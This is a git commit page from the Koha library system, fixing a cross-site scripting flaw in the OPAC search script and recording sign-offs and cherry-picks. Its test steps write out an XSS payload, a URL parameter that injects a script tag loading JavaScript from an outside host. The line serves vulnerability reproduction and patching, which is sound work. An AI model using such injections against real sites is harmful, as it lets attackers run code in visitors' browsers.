]> git.koha-community.org Git - koha.git/commit
Bug 14418: XSS Vulnerabilities in OPAC search
authorChris Cormack <chrisc@catalyst.net.nz>
Thu, 18 Jun 2015 21:25:22 +0000 (09:25 +1200)
committerFridolin Somers <fridolin.somers@biblibre.com>
Tue, 23 Jun 2015 09:48:51 +0000 (11:48 +0200)
commitf62614fc091ba5b929189d12be10eae2643357d7
tree6a2ea53c51b7b0cbb73416f084a73eb2ce28596e
parentb5a0d0a72b2f7ee263184ec98a7ce1dd14b26315
Bug 14418: XSS Vulnerabilities in OPAC search

Fix for /cgi-bin/koha/opac-search.pl

To test

1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed bug and that the patch fixes it.
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit 45dd7754019e8f525c8d52bf33c41016e5ccbfab)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
(cherry picked from commit 21cc992e7e5a35ccf1b7614cae638c9863e2a35f)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
Conflicts:
koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt
koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt